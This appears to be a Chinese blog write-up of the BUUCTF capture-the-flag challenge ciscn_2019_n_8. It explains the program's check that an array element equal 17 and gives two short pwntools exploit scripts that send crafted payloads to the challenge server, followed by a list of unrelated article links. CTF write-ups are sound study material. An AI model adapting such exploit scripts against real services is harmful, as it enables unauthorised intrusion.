当前位置: 首页 > news >正文

【BUUCTF-PWN】9-ciscn_2019_n_8

不属于栈溢出,应该是比较简单的pwn,看懂代码逻辑+使用pwntools

32位,开启了Stack、NX、PIE保护
在这里插入图片描述

执行效果:
在这里插入图片描述

main函数
在这里插入图片描述

使用通义千问询问的代码解读:
在这里插入图片描述

即当var数组的第十四个元素是17就可以
这里可以用两种payload:
第一种:
payload = b’a’134 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节
第二种:
payload = p32(17)*14

第一种对应的exp是:

from pwn import *
io = remote("node5.buuoj.cn",27250)
payload = b'a'*13*4 + p32(17) 
io.sendlineafter("What's your name?\n",payload)
io.interactive()

执行结果:
在这里插入图片描述

但看网上帖子有的用这个exp没办法连通,解决办法可以参考:[BUUCTF-pwn]——ciscn_2019_n_8_[ciscn 2019华南]pwn8-CSDN博客

第二种对应的exp是:

from pwn import *
io = remote("node5.buuoj.cn",27250)
payload = p32(17)*14
io.sendlineafter("What's your name?\n",payload)
io.interactive()

执行结果:

在这里插入图片描述

相关文章:

  • Matplotlib 简介
  • 康姿百德磁性床垫好不好,效果怎么样靠谱吗
  • Hadoop集群搭建
  • threejs 微信小程序原生版本的使用 obj模型的加载
  • 学会python——用python制作一个登录和注册窗口(python实例十八)
  • python-Django项目:图书后台管理系统
  • SpringMVC之文件上传下载
  • spring6框架解析(by尚硅谷)
  • 降级Spring Boot版本
  • Generative Modeling by Estimating Gradients of the Data Distribution
  • ChatGPT-5:开创对话式AI的新纪元
  • 【MindSpore学习打卡】应用实践-计算机视觉-SSD目标检测:从理论到实现
  • 2024年过半,新能源车谁在掉链子?
  • TP8/6 子域名绑定应用
  • docker介绍与详细安装
  • 收藏网友的 源程序下载网
  • @jsonView过滤属性
  • CentOS学习笔记 - 12. Nginx搭建Centos7.5远程repo
  • Iterator 和 for...of 循环
  • Java编程基础24——递归练习
  • JAVA并发编程--1.基础概念
  • Js基础知识(四) - js运行原理与机制
  • JS专题之继承
  • MYSQL如何对数据进行自动化升级--以如果某数据表存在并且某字段不存在时则执行更新操作为例...
  • SAP云平台运行环境Cloud Foundry和Neo的区别
  • Selenium实战教程系列(二)---元素定位
  • UEditor初始化失败(实例已存在,但视图未渲染出来,单页化)
  • unity如何实现一个固定宽度的orthagraphic相机
  • 第2章 网络文档
  • 如何选择开源的机器学习框架?
  • 软件开发学习的5大技巧,你知道吗?
  • 使用Swoole加速Laravel(正式环境中)
  • 我的面试准备过程--容器(更新中)
  • 移动互联网+智能运营体系搭建=你家有金矿啊!
  • Salesforce和SAP Netweaver里数据库表的元数据设计
  • 国内唯一,阿里云入选全球区块链云服务报告,领先AWS、Google ...
  • 继 XDL 之后,阿里妈妈开源大规模分布式图表征学习框架 Euler ...
  • ​sqlite3 --- SQLite 数据库 DB-API 2.0 接口模块​
  • #经典论文 异质山坡的物理模型 2 有效导水率
  • (C++17) std算法之执行策略 execution
  • (附源码)springboot掌上博客系统 毕业设计063131
  • (力扣题库)跳跃游戏II(c++)
  • (五)网络优化与超参数选择--九五小庞
  • (转)Java socket中关闭IO流后,发生什么事?(以关闭输出流为例) .
  • (转)MVC3 类型“System.Web.Mvc.ModelClientValidationRule”同时存在
  • .Net IE10 _doPostBack 未定义
  • .NET 依赖注入和配置系统
  • .NET/C# 使窗口永不获得焦点
  • .Net7 环境安装配置
  • .NET企业级应用架构设计系列之结尾篇
  • .net图片验证码生成、点击刷新及验证输入是否正确
  • .Net下的签名与混淆
  • /boot 内存空间不够
  • /etc/motd and /etc/issue
  • ??javascript里的变量问题